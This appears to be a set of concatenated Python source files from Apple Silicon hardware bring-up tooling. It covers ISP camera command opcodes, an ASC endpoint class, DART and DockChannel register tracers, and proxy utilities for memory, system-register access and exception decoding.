CISP_CMD_CH_CAMERA_CONFIG_CURRENT_GET		     = 0x0105
CISP_CMD_CH_CAMERA_CONFIG_GET			     = 0x0106
CISP_CMD_CH_CAMERA_CONFIG_SELECT		     = 0x0107
CISP_CMD_CH_INFO_GET				     = 0x010d
CISP_CMD_CH_BUFFER_RECYCLE_MODE_SET		     = 0x010e
CISP_CMD_CH_BUFFER_RECYCLE_START		     = 0x010f
CISP_CMD_CH_BUFFER_RECYCLE_STOP			     = 0x0110
CISP_CMD_CH_SET_FILE_LOAD			     = 0x0111
CISP_CMD_CH_SIF_PIXEL_FORMAT_SET		     = 0x0115
CISP_CMD_CH_BUFFER_POOL_CONFIG_GET		     = 0x0116
CISP_CMD_CH_BUFFER_POOL_CONFIG_SET		     = 0x0117
CISP_CMD_CH_CAMERA_MIPI_FREQUENCY_GET		     = 0x011a
CISP_CMD_CH_CAMERA_PIX_FREQUENCY_GET		     = 0x011f
CISP_CMD_CH_CAMERA_MIPI_FREQUENCY_TOTAL_GET	     = 0x0133
CISP_CMD_CH_SBS_ENABLE				     = 0x013b
CISP_CMD_CH_LSC_POLYNOMIAL_COEFF_GET		     = 0x0142
CISP_CMD_CH_CAMERA_AGILE_FREQ_ARRAY_CURRENT_GET	     = 0x015e
CISP_CMD_CH_AE_START				     = 0x0200
CISP_CMD_CH_AE_STOP				     = 0x0201
CISP_CMD_CH_AE_FRAME_RATE_MAX_SET		     = 0x0208
CISP_CMD_CH_AE_FRAME_RATE_MIN_SET		     = 0x020a
CISP_CMD_CH_AE_STABILITY_SET			     = 0x021a
CISP_CMD_CH_AE_STABILITY_TO_STABLE_SET		     = 0x0229
CISP_CMD_CH_SENSOR_NVM_GET			     = 0x0501
CISP_CMD_CH_SENSOR_PERMODULE_LSC_INFO_GET	     = 0x0507
CISP_CMD_CH_SENSOR_PERMODULE_LSC_GRID_GET	     = 0x0511
CISP_CMD_CH_LPDP_HS_RECEIVER_TUNING_SET          = 0x051b
CISP_CMD_CH_FOCUS_LIMITS_GET			     = 0x0701
CISP_CMD_CH_CROP_SET				     = 0x0801
CISP_CMD_CH_CROP_SCL1_SET                = 0x080c
CISP_CMD_CH_CNR_START				     = 0x0a2f
CISP_CMD_CH_MBNR_ENABLE				     = 0x0a3a
CISP_CMD_CH_OUTPUT_CONFIG_SET			     = 0x0b01
CISP_CMD_CH_OUTPUT_CONFIG_SCL1_SET		     = 0x0b09
CISP_CMD_CH_PREVIEW_STREAM_SET			     = 0x0b0d
CISP_CMD_CH_FACE_DETECTION_START		     = 0x0d00
CISP_CMD_CH_FACE_DETECTION_CONFIG_GET		     = 0x0d02
CISP_CMD_CH_FACE_DETECTION_CONFIG_SET		     = 0x0d03
CISP_CMD_CH_FACE_DETECTION_ENABLE		     = 0x0d05
CISP_CMD_CH_FID_START				     = 0x3000
CISP_CMD_CH_FID_STOP				     = 0x3001
CISP_CMD_IPC_ENDPOINT_SET2			     = 0x300c
CISP_CMD_IPC_ENDPOINT_UNSET2			     = 0x300d
CISP_CMD_SET_DSID_CLR_REG_BASE2			     = 0x3204
CISP_CMD_APPLE_CH_AE_METERING_MODE_SET		     = 0x8206
CISP_CMD_APPLE_CH_AE_FD_SCENE_METERING_CONFIG_SET    = 0x820e
CISP_CMD_APPLE_CH_AE_FLICKER_FREQ_UPDATE_CURRENT_SET = 0x8212
CISP_CMD_APPLE_CH_TEMPORAL_FILTER_START		     = 0xc100
CISP_CMD_APPLE_CH_MOTION_HISTORY_START		     = 0xc102
CISP_CMD_APPLE_CH_TEMPORAL_FILTER_ENABLE	     = 0xc113

opcode_dict = {
    0x0000 : "CISP_CMD_START",
    0x0001 : "CISP_CMD_STOP",
    0x0003 : "CISP_CMD_CONFIG_GET",
    0x0004 : "CISP_CMD_PRINT_ENABLE",
    0x0006 : "CISP_CMD_BUILDINFO",
    0x0011 : "CISP_CMD_SET_ISP_PMU_BASE",
    0x0013 : "CISP_CMD_RPC_ENABLE",
    0x001c : "CISP_CMD_PMP_CTRL_SET",
    0x001d : "CISP_CMD_TRACE_ENABLE",
    0x0024 : "CISP_CMD_FLICKER_SENSOR_SET",
    0x0100 : "CISP_CMD_CH_START",
    0x0101 : "CISP_CMD_CH_STOP",
    0x0104 : "CISP_CMD_CH_BUFFER_RETURN",
    0x0105 : "CISP_CMD_CH_CAMERA_CONFIG_CURRENT_GET",
    0x0106 : "CISP_CMD_CH_CAMERA_CONFIG_GET",
    0x0107 : "CISP_CMD_CH_CAMERA_CONFIG_SELECT",
    0x010d : "CISP_CMD_CH_INFO_GET",
    0x010e : "CISP_CMD_CH_BUFFER_RECYCLE_MODE_SET",
    0x010f : "CISP_CMD_CH_BUFFER_RECYCLE_START",
    0x0110 : "CISP_CMD_CH_BUFFER_RECYCLE_STOP",
    0x0111 : "CISP_CMD_CH_SET_FILE_LOAD",
    0x0115 : "CISP_CMD_CH_SIF_PIXEL_FORMAT_SET",
    0x0116 : "CISP_CMD_CH_BUFFER_POOL_CONFIG_GET",
    0x0117 : "CISP_CMD_CH_BUFFER_POOL_CONFIG_SET",
    0x011a : "CISP_CMD_CH_CAMERA_MIPI_FREQUENCY_GET",
    0x011f : "CISP_CMD_CH_CAMERA_PIX_FREQUENCY_GET",
    0x0133 : "CISP_CMD_CH_CAMERA_MIPI_FREQUENCY_TOTAL_GET",
    0x013b : "CISP_CMD_CH_SBS_ENABLE",
    0x0142 : "CISP_CMD_CH_LSC_POLYNOMIAL_COEFF_GET",
    0x015e : "CISP_CMD_CH_CAMERA_AGILE_FREQ_ARRAY_CURRENT_GET",
    0x0200 : "CISP_CMD_CH_AE_START",
    0x0201 : "CISP_CMD_CH_AE_STOP",
    0x0208 : "CISP_CMD_CH_AE_FRAME_RATE_MAX_SET",
    0x020a : "CISP_CMD_CH_AE_FRAME_RATE_MIN_SET",
    0x021a : "CISP_CMD_CH_AE_STABILITY_SET",
    0x0229 : "CISP_CMD_CH_AE_STABILITY_TO_STABLE_SET",
    0x0501 : "CISP_CMD_CH_SENSOR_NVM_GET",
    0x0507 : "CISP_CMD_CH_SENSOR_PERMODULE_LSC_INFO_GET",
    0x0511 : "CISP_CMD_CH_SENSOR_PERMODULE_LSC_GRID_GET",
    0x051b : "CISP_CMD_CH_LPDP_HS_RECEIVER_TUNING_SET",
    0x0701 : "CISP_CMD_CH_FOCUS_LIMITS_GET",
    0x0801 : "CISP_CMD_CH_CROP_SET",
    0x080c : "CISP_CMD_CH_CROP_SCL1_SET",
    0x0a2f : "CISP_CMD_CH_CNR_START",
    0x0a3a : "CISP_CMD_CH_MBNR_ENABLE",
    0x0b01 : "CISP_CMD_CH_OUTPUT_CONFIG_SET",
    0x0b09 : "CISP_CMD_CH_OUTPUT_CONFIG_SCL1_SET",
    0x0b0d : "CISP_CMD_CH_PREVIEW_STREAM_SET",
    0x0d00 : "CISP_CMD_CH_FACE_DETECTION_START",
    0x0d02 : "CISP_CMD_CH_FACE_DETECTION_CONFIG_GET",
    0x0d03 : "CISP_CMD_CH_FACE_DETECTION_CONFIG_SET",
    0x0d05 : "CISP_CMD_CH_FACE_DETECTION_ENABLE",
    0x3000 : "CISP_CMD_CH_FID_START",
    0x3001 : "CISP_CMD_CH_FID_STOP",
    0x300c : "CISP_CMD_IPC_ENDPOINT_SET2",
    0x300d : "CISP_CMD_IPC_ENDPOINT_UNSET2",
    0x3204 : "CISP_CMD_SET_DSID_CLR_REG_BASE2",
    0x8206 : "CISP_CMD_APPLE_CH_AE_METERING_MODE_SET",
    0x820e : "CISP_CMD_APPLE_CH_AE_FD_SCENE_METERING_CONFIG_SET",
    0x8212 : "CISP_CMD_APPLE_CH_AE_FLICKER_FREQ_UPDATE_CURRENT_SET",
    0xc100 : "CISP_CMD_APPLE_CH_TEMPORAL_FILTER_START",
    0xc102 : "CISP_CMD_APPLE_CH_MOTION_HISTORY_START",
    0xc113 : "CISP_CMD_APPLE_CH_TEMPORAL_FILTER_ENABLE",
}



# SPDX-License-Identifier: MIT
from ...utils import *

# System endpoints
def msg_handler(message, regtype=None):
    def f(x):
        x.is_message = True
        x.message = message
        x.regtype = regtype
        return x

    return f

class ASCMessage1(Register64):
    EP = 7, 0

class ASCTimeout(Exception):
    pass

class ASCBaseEndpoint:
    BASE_MESSAGE = Register64
    SHORT = None

    def __init__(self, asc, epnum, name=None):
        self.asc = asc
        self.epnum = epnum
        self.name = name or self.SHORT or f"{type(self).__name__}@{epnum:#x}"

        self.msghandler = {}
        self.msgtypes = {}
        for name in dir(self):
            i = getattr(self, name)
            if not callable(i):
                continue
            if not getattr(i, "is_message", False):
                continue
            self.msghandler[i.message] = i
            self.msgtypes[i.message] = i.regtype if i.regtype else self.BASE_MESSAGE

    def handle_msg(self, msg0, msg1):
        msg0 = self.BASE_MESSAGE(msg0)
        handler = self.msghandler.get(msg0.TYPE, None)
        regtype = self.msgtypes.get(msg0.TYPE, self.BASE_MESSAGE)

        if handler is None:
            return False
        return handler(regtype(msg0.value))

    def send(self, msg):
        self.asc.send(msg, ASCMessage1(EP=self.epnum))

    def start(self):
        pass

    def stop(self):
        pass

    def log(self, msg):
        print(f"[{self.name}] {msg}")



# SPDX-License-Identifier: MIT

from ..hw.dart import *
from ..hw.dart8020 import *
from ..hw.dart8110 import *
from ..hv import TraceMode
from ..utils import *
from . import ADTDevTracer

class DARTTracer(ADTDevTracer):

    DEFAULT_MODE = TraceMode.ASYNC

    NAMES = ["regs"]

    @classmethod
    def _reloadcls(cls, force=False):
        global DART8020
        global DART8020Regs
        global DART8110
        global DART8110Regs
        DART8020 = DART8020._reloadcls(force)
        DART8020Regs = DART8020Regs._reloadcls(force)
        DART8110 = DART8110._reloadcls(force)
        DART8110Regs = DART8110Regs._reloadcls(force)
        return super()._reloadcls(force)

    def __init__(self, hv, devpath, **kwargs):
        compat = hv.adt[devpath].compatible[0]
        if compat in ["dart,t6000", "dart,t8020"]:
            self.REGMAPS = [DART8020Regs]
        elif compat in ["dart,t8110"]:
            self.REGMAPS = [DART8110Regs]

        self.page_map = ScalarRangeMap()
        return super().__init__(hv, devpath, **kwargs)

    def start(self):
        super().start()
        # prime cache
        if self.dev.compatible[0] == "dart,t8110":
            for i in range(16):
                self.regs.TCR[i].val
                self.regs.TTBR[i].val
            for _ in range(8):
                self.regs.ENABLE_STREAMS[_].val
        else:
            for i in range(16):
                self.regs.TCR[i].val
                for j in range(4):
                    self.regs.TTBR[i, j].val
            self.regs.ENABLED_STREAMS.val

        self.dart = DART(self.hv.iface, self.regs, compat=self.dev.compatible[0])


    def w_STREAM_COMMAND(self, stream_command):
        if stream_command.INVALIDATE:
            self.log(f"Invalidate Stream: {self.regs.cached.STREAM_SELECT.reg}")
            self.dart.invalidate_cache()

    def w_TLB_OP(self, tlb_op):
        if tlb_op.OP == 0:
            self.log(f"Invalidate all")
            self.dart.invalidate_cache()
        elif tlb_op.OP == 1:
            self.log(f"Invalidate Stream: {tlb_op.STREAM}")
            self.dart.invalidate_cache()
        else:
            self.log(f"Unknown TLB op {tlb_op}")

        self.page_map = ScalarRangeMap()

    def trace_range(self, stream, zone, read=True, write=True, mode=TraceMode.ASYNC):
        ranges = self.dart.iotranslate(stream, zone.start, zone.stop - zone.start)
        va = zone.start
        for pa, size in ranges:
            if pa is not None:
                pzone = irange(pa, size)
                self.page_map[pzone] = (pa, va)
                self.hv.add_tracer(pzone, "DARTVATracer", mode,
                                   self.event_va if read else None,
                                   self.event_va if write else None,
                                   stream = stream)
            va += size

    def event_va(self, evt, stream=None):
        pabase, vabase = self.page_map.get(evt.addr, (None, None))
        if pabase is None:
            addr = "UNKNOWN"
        else:
            addr = f"{evt.addr - pabase + vabase:#x}"
        t = "W" if evt.flags.WRITE else "R"
        m = "+" if evt.flags.MULTI else " "
        logline = (f"[cpu{evt.flags.CPU}] [0x{evt.pc:016x}] IOVA/{stream}: {t}.{1<<evt.flags.WIDTH:<2}{m} " +
                   f"{addr} (0x{evt.addr:x}) = 0x{evt.data:x}")
        self.hv.log(logline, show_cpu=False)



# SPDX-License-Identifier: MIT
import struct

from ..hw.dockchannel import DockChannelIRQRegs, DockChannelConfigRegs, DockChannelDataRegs
from ..hv import TraceMode
from ..utils import *
from . import ADTDevTracer

class DockChannelTracer(ADTDevTracer):
    DEFAULT_MODE = TraceMode.SYNC

    REGMAPS = [None, DockChannelIRQRegs, DockChannelConfigRegs, DockChannelDataRegs]
    NAMES = [None, "irq", "config", "data"]

    def w_TX_8(self, d):
        self.tx(struct.pack("<I", d.value)[0:1])
    def w_TX_16(self, d):
        self.tx(struct.pack("<I", d.value)[0:2])
    def w_TX_24(self, d):
        self.tx(struct.pack("<I", d.value)[0:3])
    def w_TX_32(self, d):
        self.tx(struct.pack("<I", d.value))

    def r_RX_8(self, d):
        self.rx(struct.pack("<I", d.value)[1:2])
    def r_RX_16(self, d):
        self.rx(struct.pack("<I", d.value)[1:3])
    def r_RX_24(self, d):
        self.rx(struct.pack("<I", d.value)[1:4])
    def r_RX_32(self, d):
        self.rx(struct.pack("<I", d.value))

    def tx(self, d):
        pass

    def rx(self, d):
        pass



# SPDX-License-Identifier: MIT
import serial, os, struct, sys, time, json, os.path, gzip, functools
from contextlib import contextmanager
from construct import *

from .asm import ARMAsm
from .proxy import *
from .utils import Reloadable, chexdiff32
from .tgtypes import *
from .sysreg import *
from .malloc import Heap
from . import adt

__all__ = ["ProxyUtils", "RegMonitor", "GuardedHeap", "bootstrap_port"]

SIMD_B = Array(32, Array(16, Int8ul))
SIMD_H = Array(32, Array(8, Int16ul))
SIMD_S = Array(32, Array(4, Int32ul))
SIMD_D = Array(32, Array(2, Int64ul))
SIMD_Q = Array(32, BytesInteger(16, swapped=True))

# This isn't perfect, since multiple versions could have the same
# iBoot version, but it's good enough
VERSION_MAP = {
    "iBoot-7429.61.2": "V12_1",
    "iBoot-7429.81.3": "V12_2",
    "iBoot-7459.101.2": "V12_3",
    "iBoot-7459.121.3": "V12_4",
    "iBoot-7459.141.1": "V12_5",
    "iBoot-8419.0.151.0.1": "V13_0B4",
    "iBoot-8419.40.2.0.5": "V13_0B5",
    "iBoot-8419.40.33.0.1": "V13_0B6",
    "iBoot-8419.41.10": "V13_0",
    "iBoot-8419.60.44": "V13_1",
    "iBoot-8419.80.7": "V13_2",
    "iBoot-8422.100.650": "V13_3",
    "iBoot-8422.140.50.0.2": "V13_5B4",
    "iBoot-8422.141.2": "V13_5",
}

class ProxyUtils(Reloadable):
    CODE_BUFFER_SIZE = 0x10000
    def __init__(self, p, heap_size=1024 * 1024 * 1024):
        self.iface = p.iface
        self.proxy = p
        self.base = p.get_base()
        (self.ba_addr, self.ba_rev) = p.get_bootargs_rev()

        if self.ba_rev <= 1:
            self.ba = self.iface.readstruct(self.ba_addr, BootArgs_r1)
        elif  self.ba_rev == 2:
            self.ba = self.iface.readstruct(self.ba_addr, BootArgs_r2)
        elif  self.ba_rev == 3:
            self.ba = self.iface.readstruct(self.ba_addr, BootArgs_r3)

        # We allocate a 128MB heap, 128MB after the m1n1 heap, without telling it about it.
        # This frees up from having to coordinate memory management or free stuff after a Python
        # script runs, at the expense that if m1n1 ever uses more than 128MB of heap it will
        # clash with Python (m1n1 will normally not use *any* heap when running proxy ops though,
        # except when running very high-level operations like booting a kernel, so this should be
        # OK).
        self.heap_size = heap_size
        try:
            self.heap_base = p.heapblock_alloc(0)
        except ProxyRemoteError:
            # Compat with versions that don't have heapblock yet
            self.heap_base = (self.base + ((self.ba.top_of_kernel_data + 0xffff) & ~0xffff) -
                              self.ba.phys_base)

        if os.environ.get("M1N1HEAP", ""):
            self.heap_base = int(os.environ.get("M1N1HEAP", ""), 16)

        self.heap_base += 128 * 1024 * 1024 # We leave 128MB for m1n1 heap
        self.heap_top = self.heap_base + self.heap_size
        self.heap = Heap(self.heap_base, self.heap_top)
        self.proxy.heap = self.heap

        self.malloc = self.heap.malloc
        self.memalign = self.heap.memalign
        self.free = self.heap.free

        self.code_buffer = self.malloc(self.CODE_BUFFER_SIZE)

        self.adt_data = None
        self.adt = LazyADT(self)

        self.simd_buf = self.malloc(32 * 16)
        self.simd_type = None
        self.simd = None

        self.mmu_off = False

        self.inst_cache = {}

        self.exec_modes = {
            None: (self.proxy.call, REGION_RX_EL1),
            "el2": (self.proxy.call, REGION_RX_EL1),
            "el1": (self.proxy.el1_call, 0),
            "el0": (self.proxy.el0_call, REGION_RWX_EL0),
            "gl2": (self.proxy.gl2_call, REGION_RX_EL1),
            "gl1": (self.proxy.gl1_call, 0),
        }
        self._read = {
            8: lambda addr: self.proxy.read8(addr),
            16: lambda addr: self.proxy.read16(addr),
            32: lambda addr: self.proxy.read32(addr),
            64: lambda addr: self.uread64(addr),
            128: lambda addr: [self.uread64(addr),
                               self.uread64(addr + 8)],
            256: lambda addr: [self.uread64(addr),
                               self.uread64(addr + 8),
                               self.uread64(addr + 16),
                               self.uread64(addr + 24)],
            512: lambda addr: [self.uread64(addr + i) for i in range(0, 64, 8)],
        }
        self._write = {
            8: lambda addr, data: self.proxy.write8(addr, data),
            16: lambda addr, data: self.proxy.write16(addr, data),
            32: lambda addr, data: self.proxy.write32(addr, data),
            64: lambda addr, data: self.uwrite64(addr, data),
            128: lambda addr, data: (self.uwrite64(addr, data[0]),
                                     self.uwrite64(addr + 8, data[1])),
            256: lambda addr, data: (self.uwrite64(addr, data[0]),
                                     self.uwrite64(addr + 8, data[1]),
                                     self.uwrite64(addr + 16, data[2]),
                                     self.uwrite64(addr + 24, data[3])),
            512: lambda addr, data: [self.uwrite64(addr + 8 * i, data[i])
                                     for i in range(8)],
        }

    def uwrite64(self, addr, data):
        '''write 8 byte value to given address, supporting split 4-byte halves'''
        if addr & 3:
            raise AlignmentError()
        if addr & 4:
            self.proxy.write32(addr, data & 0xffffffff)
            self.proxy.write32(addr + 4, data >> 32)
        else:
            self.proxy.write64(addr, data)

    def uread64(self, addr):
        '''write 8 byte value to given address, supporting split 4-byte halves'''
        if addr & 3:
            raise AlignmentError()
        if addr & 4:
            return self.proxy.read32(addr) | (self.proxy.read32(addr + 4) << 32)
        else:
            return self.proxy.read64(addr)

    def read(self, addr, width):
        '''do a width read from addr and return it
        width can be 8, 16, 21, 64, 128 or 256'''
        val = self._read[width](addr)
        if self.proxy.get_exc_count():
            raise ProxyError("Exception occurred")
        return val

    def write(self, addr, data, width):
        '''do a width write of data to addr
        width can be 8, 16, 21, 64, 128 or 256'''
        self._write[width](addr, data)
        if self.proxy.get_exc_count():
            raise ProxyError("Exception occurred")

    def mrs(self, reg, *, silent=False, call=None):
        '''read system register reg'''
        op0, op1, CRn, CRm, op2 = sysreg_parse(reg)

        op =  ((op0 << 19) | (op1 << 16) | (CRn << 12) |
               (CRm << 8) | (op2 << 5) | 0xd5200000)

        return self.exec(op, call=call, silent=silent)

    def msr(self, reg, val, *, silent=False, call=None):
        '''Write val to system register reg'''
        op0, op1, CRn, CRm, op2 = sysreg_parse(reg)

        op =  ((op0 << 19) | (op1 << 16) | (CRn << 12) |
               (CRm << 8) | (op2 << 5) | 0xd5000000)

        self.exec(op, val, call=call, silent=silent)

    sys = msr
    sysl = mrs

    def exec(self, op, r0=0, r1=0, r2=0, r3=0, *, silent=False, call=None, ignore_exceptions=False):
        if callable(call):
            region = REGION_RX_EL1
        elif isinstance(call, tuple):
            call, region = call
        else:
            call, region = self.exec_modes[call]

        if isinstance(op, list):
            op = tuple(op)

        if op in self.inst_cache:
            func = self.inst_cache[op]
        elif isinstance(op, tuple) or isinstance(op, list):
            func = struct.pack(f"<{len(op)}II", *op, 0xd65f03c0) # ret
        elif isinstance(op, int):
            func = struct.pack("<II", op, 0xd65f03c0) # ret
        elif isinstance(op, str):
            c = ARMAsm(op + "; ret", self.code_buffer)
            func = c.data
        elif isinstance(op, bytes):
            func = op
        else:
            raise ValueError()

        if self.mmu_off:
            region = 0

        self.inst_cache[op] = func

        assert len(func) < self.CODE_BUFFER_SIZE
        self.iface.writemem(self.code_buffer, func)
        self.proxy.dc_cvau(self.code_buffer, len(func))
        self.proxy.ic_ivau(self.code_buffer, len(func))

        self.proxy.set_exc_guard(GUARD.SKIP | (GUARD.SILENT if silent else 0))
        ret = call(self.code_buffer | region, r0, r1, r2, r3)
        if not ignore_exceptions:
            cnt = self.proxy.get_exc_count()
            self.proxy.set_exc_guard(GUARD.OFF)
            if cnt:
                raise ProxyError("Exception occurred")
        else:
            self.proxy.set_exc_guard(GUARD.OFF)

        return ret

    inst = exec

    def compressed_writemem(self, dest, data, progress=None):
        if not len(data):
            return

        payload = gzip.compress(data, compresslevel=1)
        compressed_size = len(payload)

        with self.heap.guarded_malloc(compressed_size) as compressed_addr:
            self.iface.writemem(compressed_addr, payload, progress)
            timeout = self.iface.dev.timeout
            self.iface.dev.timeout = None
            try:
                decompressed_size = self.proxy.gzdec(compressed_addr, compressed_size, dest, len(data))
            finally:
                self.iface.dev.timeout = timeout

            assert decompressed_size == len(data)

    def get_adt(self):
        if self.adt_data is not None:
            return self.adt_data
        adt_base = (self.ba.devtree - self.ba.virt_base + self.ba.phys_base) & 0xffffffffffffffff
        adt_size = self.ba.devtree_size
        print(f"Fetching ADT ({adt_size} bytes)...")
        self.adt_data = self.iface.readmem(adt_base, self.ba.devtree_size)
        return self.adt_data

    def push_adt(self):
        self.adt_data = self.adt.build()
        adt_base = (self.ba.devtree - self.ba.virt_base + self.ba.phys_base) & 0xffffffffffffffff
        adt_size = len(self.adt_data)
        print(f"Pushing ADT ({adt_size} bytes)...")
        self.iface.writemem(adt_base, self.adt_data)

    def disassemble_at(self, start, size, pc=None, vstart=None, sym=None):
        '''disassemble len bytes of memory from start
         optional pc address will mark that line with a '*' '''
        code = struct.unpack(f"<{size // 4}I", self.iface.readmem(start, size))
        if vstart is None:
            vstart = start

        c = ARMAsm(".inst " + ",".join(str(i) for i in code), vstart)
        lines = list()
        for line in c.disassemble():
            sl = line.split()
            try:
                addr = int(sl[0].rstrip(":"), 16)
            except:
                addr = None
            if pc == addr:
                line = " *" + line
            else:
                line = "  " + line
            if sym:
                if s := sym(addr):
                    print()
                    print(f"{' '*len(sl[0])}   {s}:")
            print(line)

    def print_l2c_regs(self):
        print()
        print("  == L2C Registers ==")
        l2c_err_sts = self.mrs(L2C_ERR_STS_EL1)

        print(f"  L2C_ERR_STS: {l2c_err_sts:#x}")
        print(f"  L2C_ERR_ADR: {self.mrs(L2C_ERR_ADR_EL1):#x}");
        print(f"  L2C_ERR_INF: {self.mrs(L2C_ERR_INF_EL1):#x}");

        self.msr(L2C_ERR_STS_EL1, l2c_err_sts) # Clear the flag bits
        self.msr(DAIF, self.mrs(DAIF) | 0x100) # Re-enable SError exceptions

    def print_context(self, ctx, is_fault=True, addr=lambda a: f"0x{a:x}", sym=None, num_ctx=9):
        print(f"  == Exception taken from {ctx.spsr.M.name} ==")
        el = ctx.spsr.M >> 2
        print(f"  SPSR   = {ctx.spsr}")
        print(f"  ELR    = {addr(ctx.elr)}" + (f" (0x{ctx.elr_phys:x})" if ctx.elr_phys else ""))
        print(f"  SP_EL{el} = 0x{ctx.sp[el]:x}" + (f" (0x{ctx.sp_phys:x})" if ctx.sp_phys else ""))
        if is_fault:
            print(f"  ESR    = {ctx.esr}")
            print(f"  FAR    = {addr(ctx.far)}" + (f" (0x{ctx.far_phys:x})" if ctx.far_phys else ""))

        for i in range(0, 31, 4):
            j = min(30, i + 3)
            print(f"  {f'x{i}-x{j}':>7} = {' '.join(f'{r:016x}' for r in ctx.regs[i:j + 1])}")

        if ctx.elr_phys:
            print()
            print("  == Code context ==")

            off = -(num_ctx // 2)

            self.disassemble_at(ctx.elr_phys + 4 * off, num_ctx * 4, ctx.elr, ctx.elr + 4 * off, sym=sym)

        if is_fault:
            if ctx.esr.EC == ESR_EC.MSR or ctx.esr.EC == ESR_EC.IMPDEF and ctx.esr.ISS == 0x20:
                print()
                print("  == MRS/MSR fault decoding ==")
                if ctx.esr.EC == ESR_EC.MSR:
                    iss = ESR_ISS_MSR(ctx.esr.ISS)
                else:
                    iss = ESR_ISS_MSR(self.mrs(AFSR1_EL2))
                enc = iss.Op0, iss.Op1, iss.CRn, iss.CRm, iss.Op2
                if enc in sysreg_rev:
                    name = sysreg_rev[enc]
                else:
                    name = f"s{iss.Op0}_{iss.Op1}_c{iss.CRn}_c{iss.CRm}_{iss.Op2}"
                if iss.DIR == MSR_DIR.READ:
                    print(f"  Instruction:   mrs x{iss.Rt}, {name}")
                else:
                    print(f"  Instruction:   msr {name}, x{iss.Rt}")

            if ctx.esr.EC in (ESR_EC.DABORT, ESR_EC.DABORT_LOWER):
                print()
                print("  == Data abort decoding ==")
                iss = ESR_ISS_DABORT(ctx.esr.ISS)
                if iss.ISV:
                    print(f"  ISS: {iss!s}")
                else:
                    print("  No instruction syndrome available")

                if iss.DFSC == DABORT_DFSC.ECC_ERROR:
                    self.print_l2c_regs()

            if ctx.esr.EC == ESR_EC.SERROR and ctx.esr.ISS == 0:
                self.print_l2c_regs()

        print()

    @contextmanager
    def mmu_disabled(self):
        flags = self.proxy.mmu_disable()
        try:
            yield
        finally:
            self.proxy.mmu_restore(flags)

    def push_simd(self):
        if self.simd is not None:
            data = self.simd_type.build(self.simd)
            self.iface.writemem(self.simd_buf, data)
            self.proxy.put_simd_state(self.simd_buf)
            self.simd = self.simd_type = None

    def get_simd(self, simd_type):
        if self.simd is not None and self.simd_type is not simd_type:
            data = self.simd_type.build(self.simd)
            self.simd = simd_type.parse(data)
            self.simd_type = simd_type
        elif self.simd is None:
            self.proxy.get_simd_state(self.simd_buf)
            data = self.iface.readmem(self.simd_buf, 32 * 16)
            self.simd = simd_type.parse(data)
            self.simd_type = simd_type

        return self.simd

    @property
    def b(self):
        return self.get_simd(SIMD_B)
    @property
    def h(self):
        return self.get_simd(SIMD_H)
    @property
    def s(self):
        return self.get_simd(SIMD_S)
    @property
    def d(self):
        return self.get_simd(SIMD_D)
    @property
    def q(self):
        return self.get_simd(SIMD_Q)

    def get_version(self, v):
        if isinstance(v, bytes):
            v = v.split(b"\0")[0].decode("ascii")
        return VERSION_MAP.get(v, None)

    @property
    def version(self):
        return self.get_version(self.adt["/chosen"].firmware_version)

    @property
    def sfr_version(self):
        return self.get_version(self.adt["/chosen"].system_firmware_version)

class LazyADT:
    def __init__(self, utils):
        self.__dict__["_utils"] = utils

    @functools.cached_property
    def _adt(self):
        return adt.load_adt(self._utils.get_adt())
    def __getitem__(self, item):
        return self._adt[item]
    def __setitem__(self, item, value):
         self._adt[item] = value
    def __delitem__(self, item):
         del self._adt[item]
    def __contains__(self, item):
        return item in self._adt
    def __getattr__(self, attr):
        return getattr(self._adt, attr)
    def __setattr__(self, attr, value):
        return setattr(self._adt, attr, value)
    def __delattr__(self, attr):
        return delattr(self._adt, attr)
    def __str__(self, t=""):
        return str(self._adt)
    def __iter__(self):
        return iter(self._adt)

class RegMonitor(Reloadable):
    def __init__(self, utils, bufsize=0x100000, ascii=False, log=None):
        self.utils = utils
        self.proxy = utils.proxy
        self.iface = self.proxy.iface
        self.ranges = []
        self.last = []
        self.bufsize = bufsize
        self.ascii = ascii
        self.log = log or print

        if bufsize:
            self.scratch = utils.malloc(bufsize)
        else:
            self.scratch = None

    def readmem(self, start, size, readfn):
        if readfn:
            return readfn(start, size)
        if self.scratch:
            assert size < self.bufsize
            self.proxy.memcpy32(self.scratch, start, size)
            start = self.scratch
        return self.proxy.iface.readmem(start, size)

    def add(self, start, size, name=None, offset=None, readfn=None):
        if offset is None:
            offset = start
        self.ranges.append((start, size, name, offset, readfn))
        self.last.append(None)

    def show_regions(self, log=print):
        for start, size, name, offset, readfn in sorted(self.ranges):
            end = start + size - 1
            log(f"{start:#x}..{end:#x} ({size:#x})\t{name}")

    def poll(self):
        if not self.ranges:
            return
        cur = []
        for (start, size, name, offset, readfn), last in zip(self.ranges, self.last):
            count = size // 4
            block = self.readmem(start, size, readfn)
            if block is None:
                if last is not None:
                    self.log(f"# Lost: {name} ({start:#x}..{start + size - 1:#x})")
                cur.append(None)
                continue

            words = struct.unpack("<%dI" % count, block)
            cur.append(block)
            if last == block:
                continue
            if name:
                header = f"# {name} ({start:#x}..{start + size - 1:#x})\n"
            else:
                header = f"# ({start:#x}..{start + size - 1:#x})\n"

            self.log(header + chexdiff32(last, block, offset=offset))
        self.last = cur

class GuardedHeap:
    def __init__(self, malloc, memalign=None, free=None):
        if isinstance(malloc, Heap):
            malloc, memalign, free = malloc.malloc, malloc.memalign, malloc.free

        self.ptrs = set()
        self._malloc = malloc
        self._memalign = memalign
        self._free = free

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        self.free_all()
        return False

    def malloc(self, sz):
        ptr = self._malloc(sz)
        self.ptrs.add(ptr)
        return ptr

    def memalign(self, align, sz):
        ptr = self._memalign(align, sz)
        self.ptrs.add(ptr)
        return ptr

    def free(self, ptr):
        self.ptrs.remove(ptr)
        self._free(ptr)

    def free_all(self):
        for ptr in self.ptrs:
            self._free(ptr)
        self.ptrs = set()

def bootstrap_port(iface, proxy):
    to = iface.dev.timeout
    iface.dev.timeout = 0.15
    try:
        do_baud = proxy.iodev_whoami() == IODEV.UART
    except ProxyCommandError:
        # Old m1n1 version -- assume non-USB serial link, force baudrate adjust
        do_baud = True
    except UartTimeout:
        # Assume the receiving end is already at 1500000
        iface.dev.baudrate = 1500000
        do_baud = False

    if do_baud:
        try:
            iface.nop()
            proxy.set_baud(1500000)
        except UartTimeout:
            # May fail even if the setting did get applied; checked by the .nop next
            iface.dev.baudrate = 1500000

    iface.nop()
    iface.dev.timeout = to
